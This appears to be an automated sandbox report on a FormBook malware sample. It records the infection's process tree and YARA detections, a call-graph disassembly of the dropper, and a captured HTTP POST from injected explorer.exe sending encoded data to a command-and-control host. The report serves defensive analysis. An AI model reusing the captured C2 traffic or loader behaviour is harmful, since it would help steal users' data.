                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.449704192.185.35.8680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:26:01.502938986 CET122OUTPOST /henz/ HTTP/1.1
                                                Host: www.lopezmodeling.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.lopezmodeling.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.lopezmodeling.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
                                                Nov 30, 2022 01:26:01.644731998 CET124INHTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:26:01 GMT
                                                Server: Apache
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnly
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Content-Length: 869
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 db 6e e4 36 0c 7d cf 57 28 7e ed c8 9e 74 93 b4 48 c7 53 60 b3 4d 81 02 db 04 4d ba 40 9f 0a d9 a2 6d 6d 24 51 90 38 37 a0 1f 5f d9 1e cf 2d 93 ec 26 31 40 88 34 c9 c3 db 99 9c 7e ba bd 7e f8 e7 ee 37 d6 90 d1 d3 93 49 fb 30 2d 6c 9d 27 60 f9 2c 24 d3 13 16 bf 49 03 42 f6 6a 67 1a 20 c1 ca 46 f8 00 94 27 33 aa f8 cf c9 13 37 5a 02 1b dd 0b 25 a9 c9 25 cc 55 09 bc 33 46 4c 59 45 4a 68 1e 4a a1 21 3f 4b c7 09 b3 c2 40 9e cc 15 2c 1c 7a 8a 70 5b 3c 52 a4 61 3a c9 fa f7 a0 4e 9f e7 b1 40 0a c9 b6 aa 45 65 25 2c 47 cc 62 85 5a e3 e2 f9 06 87 da 12 42 e9 95 23 85 f6 db c1 8f b0 5a a0 97 61 af d1 53 ce d9 8d 88 83 a2 0d 8c f3 e8 3a 70 fe 8e 58 6b 60 37 11 ad 0f d8 78 b5 b2 8f ac f1 50 e5 49 43 e4 c2 55 96 55 6d 54 5a 77 29 c2 a9 90 96 68 b2 32 84 5f 2b 61 94 5e e5 b7 0e ec 0f f7 c2 86 ab 0f e3 f1 28 8a 1a 9d 47 e5 bc 55 2e a3 72 d9 2a 3f 45 25 8a fa ef af b8 e9 85 58 1d 89 bd 88 ca c5 f1 a4 3b 74 4e 1d 2d f0 7c 52 c2 3c e8 3c 09 b4 d2 10 1a 00 7a b2 a2 2f 60 25 7a 76 7d 7f cf 6e 54 0c 7a 76 13 d9 fc c7 7f e7 5d 70 26 30 b4 92 c6 f9 8f 15 f8 46 76 81 91 1d e4 85 6b f7 b7 b5 52 a3 ec 7b 11 79 77 ed 43 fb cd a8 cb 1e ae 6f b3 37 de d1 65 ad 55 dd 50 04 ea 00 37 d6 3b 10 3d 18 d5 b5 b5 d5 de 88 14 16 ca c1 f0 f0 62 66 a5 86 57 37 d6 8e 55 a1 25 2e 16 10 d0 bc 08 b0 4f c2 07 30 4e 0b 02 f6 59 28 bb e1 e2 8b 54 6c 8b 75 88 2f b5 38 c9 1a 10 72 5d ad ff 53 a0 5c ed a0 4a 35 67 a5 16 21 e4 89 13 52 2a 5b 73 23 13 d6 21 e5 89 11 be 56 96 13 ba ab 8b b1 5b fe 32 c0 ee 64 79 5c 24 c7 f1 4a d4 11 8b 9f b3 b5 82 55 15 80 d6 76 30 fc 72 50 d6 8e 0f 8c 60 49 bc 04 4b e0 77 30 0f 71 9b 8b 64 7a 8b 2e 8c d8 43 a3 02 bb 13 35 b0 6b 9c 69 c9 fe 44 62 1f 81 dd 60 bc df e9 24 8b 39 07 28 cd d9 00 62 da a1 b8 45 0b 0c bc 47 cf db 45 c5 e9 93 e9 f9 f8 3c ae ed 6c e7 44 9b e5 6d 70 c4 00 53 90 65 51 78 98 95 25 84 c0 0c 2f 90 08 4d 1c 2b 59 1f 2b 99 4e d4 10 5e 09 56 09 de 44 6e c4 bf 99 9a b2 8f a2 7c 64 84 ec 93 08 4d 81 c2 cb 49 26 a6 6f af 95 95 91 7e a2 24 3e 0b 4f cb 82 9d 83 46 37 94 be ee 43 d9 df 61 af 66 bf b6 8e 95 59 1a 0f b4 21 e1 9e 23 5e bd 73 ec fd dc 12 68 9f b9 ad f7 0b 58 89 9e fd d1 33 3b f4 c9 a1 f4 ca 11 0b be ec 39 3d ef 82 32 37 f3 50 c6 1b 46 1a ec ea e9 d7 76 a8 ac 4f 7a 3e 5b 60 68 e5 3b a3 0b 44 0a e4 85 cb be 86 ad 91 16 91 41 1a 52 a3 ec 77 e2 d4 5a d5 0d 15 b8 6c 71 36 c6 2b 00 54 c0 c8 48 e0 5a ac 70 46 83 99 ba c7 5a be 02 25 2c 94 83 e1 e1 af 9e c2 35 8e 83 11 4a f3 0a bd c9 e6 42 2b 29 08 0e b2 4f ba 8b 3e 80 71 3a 3a d9 67 a1 ec 70 d8 e3 77 8d 2b 89 a0 87 4d f4 a4 2a 50 ae 5a 1e 35 64 f4 f4 e4 7f 32 2e 84 2b 05 0a 00 00
                                                Data Ascii: Rn6}W(~tHS`MM@mm$Q87_-&1@4~~7I0-l'`,$IBjg F'37Z%%U3FLYEJhJ!?K@,zp[<Ra:N@Ee%,GbZB#ZaS:pXk`7xPICUUmTZw)h2_+a^(GU.r*?E%X;tN-|R<<z/`%zv}nTzv]p&0FvkR{ywCo7eUP7;=bfW7U%.O0NY(Tlu/8r]S\J5g!R*[s#!V[2dy\$JUv0rP`IKw0qdz.C5kiDb`$9(bEGE<lDmpSeQx%/M+Y+N^VDn|dMI&o~$>OF7CafY!#^shX3;9=27PFvOz>[`h;DARwZlq6+THZpFZ%,5JB+)O>q::gpw+M*PZ5d2.+


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:01:24:07
                                                Start date:30/11/2022
                                                Path:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Imagebase:0x400000
                                                File size:278807 bytes
                                                MD5 hash:30571D64C9A9ED267159FA941A20840C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:1
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 54%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:2
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c72c0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:3
                                                Start time:01:24:09
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:01:24:13
                                                Start date:30/11/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff618f60000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:5
                                                Start time:01:24:44
                                                Start date:30/11/2022
                                                Path:C:\Windows\SysWOW64\help.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\help.exe
                                                Imagebase:0x110000
                                                File size:10240 bytes
                                                MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:15%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:22.9%
                                                  Total number of Nodes:1272
                                                  Total number of Limit Nodes:22
                                                  execution_graph 3533 401cc1 GetDlgItem GetClientRect 3534 402a0c 18 API calls 3533->3534 3535 401cf1 LoadImageA SendMessageA 3534->3535 3536 4028a1 3535->3536 3537 401d0f DeleteObject 3535->3537 3537->3536 3538 401dc1 3539 402a0c 18 API calls 3538->3539 3540 401dc7 3539->3540 3541 402a0c 18 API calls 3540->3541 3542 401dd0 3541->3542 3543 402a0c 18 API calls 3542->3543 3544 401dd9 3543->3544 3545 402a0c 18 API calls 3544->3545 3546 401de2 3545->3546 3547 401423 25 API calls 3546->3547 3548 401de9 ShellExecuteA 3547->3548 3549 401e16 3548->3549 3550 401645 3551 402a0c 18 API calls 3550->3551 3552 40164c 3551->3552 3553 402a0c 18 API calls 3552->3553 3554 401655 3553->3554 3555 402a0c 18 API calls 3554->3555 3556 40165e MoveFileA 3555->3556 3557 401671 3556->3557 3558 40166a 3556->3558 3559 405ff6 2 API calls 3557->3559 3562 40217f 3557->3562 3560 401423 25 API calls 3558->3560 3561 401680 3559->3561 3560->3562 3561->3562 3563 405a49 40 API calls 3561->3563 3563->3558 3564 401ec5 3565 402a0c 18 API calls 3564->3565 3566 401ecc 3565->3566 3567 406087 5 API calls 3566->3567 3568 401edb 3567->3568 3569 401ef3 GlobalAlloc 3568->3569 3570 401f5b 3568->3570 3569->3570 3571 401f07 3569->3571 3572 406087 5 API calls 3571->3572 3573 401f0e 3572->3573 3574 406087 5 API calls 3573->3574 3575 401f18 3574->3575 3575->3570 3579 405c59 wsprintfA 3575->3579 3577 401f4f 3580 405c59 wsprintfA 3577->3580 3579->3577 3580->3570 3581 4023c5 3592 402b16 3581->3592 3583 4023cf 3584 402a0c 18 API calls 3583->3584 3585 4023d8 3584->3585 3586 4023e2 RegQueryValueExA 3585->3586 3590 402672 3585->3590 3587 402402 3586->3587 3588 402408 RegCloseKey 3586->3588 3587->3588 3596 405c59 wsprintfA 3587->3596 3588->3590 3593 402a0c 18 API calls 3592->3593 3594 402b2f 3593->3594 3595 402b3d RegOpenKeyExA 3594->3595 3595->3583 3596->3588 3597 404746 3598 404772 3597->3598 3599 404756 3597->3599 3600 4047a5 3598->3600 3601 404778 SHGetPathFromIDListA 3598->3601 3608 4055a0 GetDlgItemTextA 3599->3608 3604 40478f SendMessageA 3601->3604 3605 404788 3601->3605 3603 404763 SendMessageA 3603->3598 3604->3600 3606 40140b 2 API calls 3605->3606 3606->3604 3608->3603 3612 4040cb lstrcpynA lstrlenA 3291 40324f SetErrorMode GetVersion 3292 403285 3291->3292 3293 40328b 3291->3293 3294 406087 5 API calls 3292->3294 3295 40601d 3 API calls 3293->3295 3294->3293 3296 4032a0 3295->3296 3297 40601d 3 API calls 3296->3297 3298 4032aa 3297->3298 3299 40601d 3 API calls 3298->3299 3300 4032b4 3299->3300 3301 406087 5 API calls 3300->3301 3302 4032bb 3301->3302 3303 406087 5 API calls 3302->3303 3304 4032c2 #17 OleInitialize SHGetFileInfoA 3303->3304 3384 405cfb lstrcpynA 3304->3384 3306 4032ff GetCommandLineA 3385 405cfb lstrcpynA 3306->3385 3308 403311 GetModuleHandleA 3309 403328 3308->3309 3310 405819 CharNextA 3309->3310 3311 40333c CharNextA 3310->3311 3319 403349 3311->3319 3312 4033b2 3313 4033c5 GetTempPathA 3312->3313 3386 40321e 3313->3386 3315 4033db 3316 4033ff DeleteFileA 3315->3316 3317 4033df GetWindowsDirectoryA lstrcatA 3315->3317 3396 402c88 GetTickCount GetModuleFileNameA 3316->3396 3320 40321e 12 API calls 3317->3320 3318 405819 CharNextA 3318->3319 3319->3312 3319->3318 3323 4033b4 3319->3323 3322 4033fb 3320->3322 3322->3316 3326 40347d ExitProcess OleUninitialize 3322->3326 3483 405cfb lstrcpynA 3323->3483 3324 403410 3324->3326 3332 405819 CharNextA 3324->3332 3365 403469 3324->3365 3327 4035a1 3326->3327 3328 403492 3326->3328 3330 403644 ExitProcess 3327->3330 3336 406087 5 API calls 3327->3336 3329 4055bc MessageBoxIndirectA 3328->3329 3335 4034a0 ExitProcess 3329->3335 3334 403427 3332->3334 3340 403444 3334->3340 3341 4034a8 3334->3341 3338 4035b4 3336->3338 3339 406087 5 API calls 3338->3339 3342 4035bd 3339->3342 3344 4058cf 18 API calls 3340->3344 3486 405543 3341->3486 3345 406087 5 API calls 3342->3345 3347 40344f 3344->3347 3348 4035c6 3345->3348 3347->3326 3484 405cfb lstrcpynA 3347->3484 3351 4035e4 3348->3351 3359 4035d4 GetCurrentProcess 3348->3359 3349 4034c9 lstrcatA lstrcmpiA 3349->3326 3353 4034e5 3349->3353 3350 4034be lstrcatA 3350->3349 3352 406087 5 API calls 3351->3352 3355 40361b 3352->3355 3356 4034f1 3353->3356 3357 4034ea 3353->3357 3360 403630 ExitWindowsEx 3355->3360 3366 40363d 3355->3366 3494 405526 CreateDirectoryA 3356->3494 3489 4054a9 CreateDirectoryA 3357->3489 3358 40345e 3485 405cfb lstrcpynA 3358->3485 3359->3351 3360->3330 3360->3366 3426 40374e 3365->3426 3499 40140b 3366->3499 3367 4034f6 SetCurrentDirectoryA 3368 403510 3367->3368 3369 403505 3367->3369 3498 405cfb lstrcpynA 3368->3498 3497 405cfb lstrcpynA 3369->3497 3373 405d1d 18 API calls 3374 403540 DeleteFileA 3373->3374 3375 40354d CopyFileA 3374->3375 3381 40351e 3374->3381 3375->3381 3376 403595 3377 405a49 40 API calls 3376->3377 3379 40359c 3377->3379 3378 405a49 40 API calls 3378->3381 3379->3326 3380 405d1d 18 API calls 3380->3381 3381->3373 3381->3376 3381->3378 3381->3380 3382 40555b 2 API calls 3381->3382 3383 403581 CloseHandle 3381->3383 3382->3381 3383->3381 3384->3306 3385->3308 3387 405f5d 5 API calls 3386->3387 3389 40322a 3387->3389 3388 403234 3388->3315 3389->3388 3390 4057ee 3 API calls 3389->3390 3391 40323c 3390->3391 3392 405526 2 API calls 3391->3392 3393 403242 3392->3393 3394 405a01 2 API calls 3393->3394 3395 40324d 3394->3395 3395->3315 3502 4059d2 GetFileAttributesA CreateFileA 3396->3502 3398 402ccb 3425 402cd8 3398->3425 3503 405cfb lstrcpynA 3398->3503 3400 402cee 3401 405835 2 API calls 3400->3401 3402 402cf4 3401->3402 3504 405cfb lstrcpynA 3402->3504 3404 402cff GetFileSize 3405 402e00 3404->3405 3423 402d16 3404->3423 3406 402be9 33 API calls 3405->3406 3407 402e07 3406->3407 3410 402e43 GlobalAlloc 3407->3410 3407->3425 3506 403207 SetFilePointer 3407->3506 3408 4031d5 ReadFile 3408->3423 3409 402e9b 3412 402be9 33 API calls 3409->3412 3411 402e5a 3410->3411 3416 405a01 2 API calls 3411->3416 3412->3425 3414 402e24 3417 4031d5 ReadFile 3414->3417 3415 402be9 33 API calls 3415->3423 3418 402e6b CreateFileA 3416->3418 3419 402e2f 3417->3419 3420 402ea5 3418->3420 3418->3425 3419->3410 3419->3425 3505 403207 SetFilePointer 3420->3505 3422 402eb3 3424 402f2e 48 API calls 3422->3424 3423->3405 3423->3408 3423->3409 3423->3415 3423->3425 3424->3425 3425->3324 3427 406087 5 API calls 3426->3427 3428 403762 3427->3428 3429 403768 3428->3429 3430 40377a 3428->3430 3516 405c59 wsprintfA 3429->3516 3431 405be2 3 API calls 3430->3431 3432 40379b 3431->3432 3434 4037b9 lstrcatA 3432->3434 3436 405be2 3 API calls 3432->3436 3435 403778 3434->3435 3507 403a17 3435->3507 3436->3434 3439 4058cf 18 API calls 3440 4037eb 3439->3440 3441 403874 3440->3441 3443 405be2 3 API calls 3440->3443 3442 4058cf 18 API calls 3441->3442 3444 40387a 3442->3444 3445 403817 3443->3445 3446 40388a LoadImageA 3444->3446 3447 405d1d 18 API calls 3444->3447 3445->3441 3450 403833 lstrlenA 3445->3450 3453 405819 CharNextA 3445->3453 3448 4038b5 RegisterClassA 3446->3448 3449 40393e 3446->3449 3447->3446 3451 4038f1 SystemParametersInfoA CreateWindowExA 3448->3451 3481 403479 3448->3481 3452 40140b 2 API calls 3449->3452 3454 403841 lstrcmpiA 3450->3454 3455 403867 3450->3455 3451->3449 3456 403944 3452->3456 3457 403831 3453->3457 3454->3455 3458 403851 GetFileAttributesA 3454->3458 3459 4057ee 3 API calls 3455->3459 3461 403a17 19 API calls 3456->3461 3456->3481 3457->3450 3460 40385d 3458->3460 3462 40386d 3459->3462 3460->3455 3464 405835 2 API calls 3460->3464 3465 403955 3461->3465 3517 405cfb lstrcpynA 3462->3517 3464->3455 3466 403961 ShowWindow 3465->3466 3467 4039e4 3465->3467 3468 40601d 3 API calls 3466->3468 3518 4050b9 OleInitialize 3467->3518 3470 403979 3468->3470 3472 403987 GetClassInfoA 3470->3472 3475 40601d 3 API calls 3470->3475 3471 4039ea 3473 403a06 3471->3473 3474 4039ee 3471->3474 3477 4039b1 DialogBoxParamA 3472->3477 3478 40399b GetClassInfoA RegisterClassA 3472->3478 3476 40140b 2 API calls 3473->3476 3479 40140b 2 API calls 3474->3479 3474->3481 3475->3472 3476->3481 3480 40140b 2 API calls 3477->3480 3478->3477 3479->3481 3482 4039d9 3480->3482 3481->3326 3482->3481 3483->3313 3484->3358 3485->3365 3487 406087 5 API calls 3486->3487 3488 4034ad lstrcatA 3487->3488 3488->3349 3488->3350 3490 4034ef 3489->3490 3491 4054fa GetLastError 3489->3491 3490->3367 3491->3490 3492 405509 SetFileSecurityA 3491->3492 3492->3490 3493 40551f GetLastError 3492->3493 3493->3490 3495 405536 3494->3495 3496 40553a GetLastError 3494->3496 3495->3367 3496->3495 3497->3368 3498->3381 3500 401389 2 API calls 3499->3500 3501 401420 3500->3501 3501->3330 3502->3398 3503->3400 3504->3404 3505->3422 3506->3414 3508 403a2b 3507->3508 3525 405c59 wsprintfA 3508->3525 3510 403a9c 3511 405d1d 18 API calls 3510->3511 3512 403aa8 SetWindowTextA 3511->3512 3513 403ac4 3512->3513 3514 4037c9 3512->3514 3513->3514 3515 405d1d 18 API calls 3513->3515 3514->3439 3515->3513 3516->3435 3517->3441 3526 404003 3518->3526 3520 4050dc 3524 405103 3520->3524 3529 401389 3520->3529 3521 404003 SendMessageA 3522 405115 OleUninitialize 3521->3522 3522->3471 3524->3521 3525->3510 3527 40401b 3526->3527 3528 40400c SendMessageA 3526->3528 3527->3520 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3520 3531->3530 3532 4013cb MulDiv SendMessageA 3531->3532 3532->3531 3613 402b51 3614 402b60 SetTimer 3613->3614 3615 402b79 3613->3615 3614->3615 3616 402bc7 3615->3616 3617 402bcd MulDiv 3615->3617 3618 402b87 wsprintfA SetWindowTextA SetDlgItemTextA 3617->3618 3618->3616 3627 402654 3628 402a0c 18 API calls 3627->3628 3629 40265b FindFirstFileA 3628->3629 3630 40267e 3629->3630 3633 40266e 3629->3633 3635 405c59 wsprintfA 3630->3635 3632 402685 3636 405cfb lstrcpynA 3632->3636 3635->3632 3636->3633 3637 4024d4 3638 4024d9 3637->3638 3639 4024ea 3637->3639 3646 4029ef 3638->3646 3640 402a0c 18 API calls 3639->3640 3642 4024f1 lstrlenA 3640->3642 3644 4024e0 3642->3644 3643 402672 3644->3643 3645 402510 WriteFile 3644->3645 3645->3643 3647 405d1d 18 API calls 3646->3647 3648 402a03 3647->3648 3648->3644 3649 4014d6 3650 4029ef 18 API calls 3649->3650 3651 4014dc Sleep 3650->3651 3653 4028a1 3651->3653 3659 4018d8 3660 40190f 3659->3660 3661 402a0c 18 API calls 3660->3661 3662 401914 3661->3662 3663 405620 70 API calls 3662->3663 3664 40191d 3663->3664 3665 4018db 3666 402a0c 18 API calls 3665->3666 3667 4018e2 3666->3667 3668 4055bc MessageBoxIndirectA 3667->3668 3669 4018eb 3668->3669 3166 40365c 3167 403677 3166->3167 3168 40366d CloseHandle 3166->3168 3169 403681 CloseHandle 3167->3169 3170 40368b 3167->3170 3168->3167 3169->3170 3175 4036b9 3170->3175 3176 4036c7 3175->3176 3177 403690 3176->3177 3178 4036cc FreeLibrary GlobalFree 3176->3178 3179 405620 3177->3179 3178->3177 3178->3178 3221 4058cf 3179->3221 3182 405654 3195 405789 3182->3195 3235 405cfb lstrcpynA 3182->3235 3183 40563d DeleteFileA 3184 40369c 3183->3184 3186 40567e 3187 405682 lstrcatA 3186->3187 3188 40568f 3186->3188 3190 405695 3187->3190 3236 405835 lstrlenA 3188->3236 3189 405ff6 2 API calls 3192 4057ae 3189->3192 3193 4056a3 lstrcatA 3190->3193 3194 4056ae lstrlenA FindFirstFileA 3190->3194 3192->3184 3196 4057ee 3 API calls 3192->3196 3193->3194 3194->3195 3200 4056d2 3194->3200 3195->3184 3195->3189 3198 4057b8 3196->3198 3197 405819 CharNextA 3197->3200 3199 4059b3 2 API calls 3198->3199 3201 4057be RemoveDirectoryA 3199->3201 3200->3197 3205 405768 FindNextFileA 3200->3205 3210 40572f 